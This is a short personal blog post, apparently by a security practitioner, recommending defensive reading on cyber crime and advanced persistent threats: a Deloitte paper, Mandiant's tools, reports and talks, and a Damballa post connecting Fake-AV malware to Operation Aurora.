<br />Here's an interesting paper from Deloitte: </span>
<br /><a style="font-family: arial;" href="http://www.deloitte.com/assets/Dcom-UnitedStates/Local%20Assets/Documents/AERS/us_aers_Deloitte%20Cyber%20Crime%20POV%20Jan252010.pdf">Cyber crime: a clear and present danger -- Combating the fastest growing cyber security threat</a><span style="font-family:arial;">
<br />
<br /><span style="font-family:arial;">One of my favorite sites is the one from </span></span><a style="font-family: arial;" href="http://www.mandiant.com/">Mandiant</a><span style="font-family:arial;"> (not just because of the </span><a style="font-family: arial;" href="http://www.mandiant.com/products/free_software">great free IR tools</a><span style="font-family:arial;"> they offer). They also have </span><a style="font-family: arial;" href="http://www.mandiant.com/services/advanced_persistent_threat">services about APT</a><span style="font-family:arial;"> and the </span><a style="font-family: arial;" href="http://www.mandiant.com/products/services/m-trends">M-Trends report</a><span style="font-family:arial;"> is a good read, too. I can also recommend their <a href="http://blog.mandiant.com/">M-unition blog</a> and their <a href="http://www.mandiant.com/index.php/news_events/presentation_archives">presentations</a>, especially the latest one "<a href="http://www.mandiant.com/presentations/state_of_the_hack_silent_but_deadly/">State of the Hack: Silent But Deadly</a>" from March 11 (slides, video, audio available).
<br />
<br />Another <a href="http://blog.damballa.com/">blog</a> I like to read is from Damballa: <a href="http://blog.damballa.com/?tag=apt">The Day Before Zero</a>
<br />The post "<a href="http://blog.damballa.com/?p=578">The Truth About Two Malware Families Related to Operation Aurora</a>" makes a connection from Fake-AV Malware to <a href="http://en.wikipedia.org/wiki/Operation_Aurora">Operation Aurora</a>. I see lots of Fake-AV events from infected websites and Blackhat SEO Google redirects. Should I be worried now?
<br />
<br />I don't want to spill all the best links at once, so I will write more later...
<br />
<br />Thanks for stopping by and please come back again :-)
<br />
<br />*** Disclaimer: I'm not affiliated with any of the companies linked in this blog.
<br />I won't tell you what company I work for, unless you find out yourself. ***
<br /></span>
<br /></span>TomUhttp://www.blogger.com/profile/16795133222461988201noreply@blogger.com0